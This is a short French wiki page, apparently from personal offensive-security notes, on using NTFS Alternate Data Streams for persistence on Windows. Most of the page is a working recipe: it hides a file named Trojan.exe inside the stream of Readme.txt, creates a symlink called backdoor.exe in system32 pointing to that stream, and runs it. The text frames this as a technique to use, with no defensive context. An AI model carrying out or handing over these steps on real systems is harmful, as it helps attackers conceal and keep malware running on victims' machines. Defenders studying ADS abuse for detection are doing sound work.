[Persistence/Windows] NTFS Data Stream

Introduction

Les Alternate Data Streams, ou ADS, permettent de cacher des fichiers dans des fichiers sur des systèmes de fichiers NTFS.

image.png

Manuel

type Trojan.exe > c:\Readme.txt:Trojan.exe

Pour créer un lien dans le fichier Readme.txt vers le Trojan :

cd c:\Windows\system32
mklink backdoor.exe Readme.txt:Trojan.exe

Vous devriez pouvoir lancer votre backdoor de la manière suivante :

backdoor

Revision #2
Created 16 April 2024 16:06:54 by Elieroc
Updated 3 May 2024 13:33:08 by Elieroc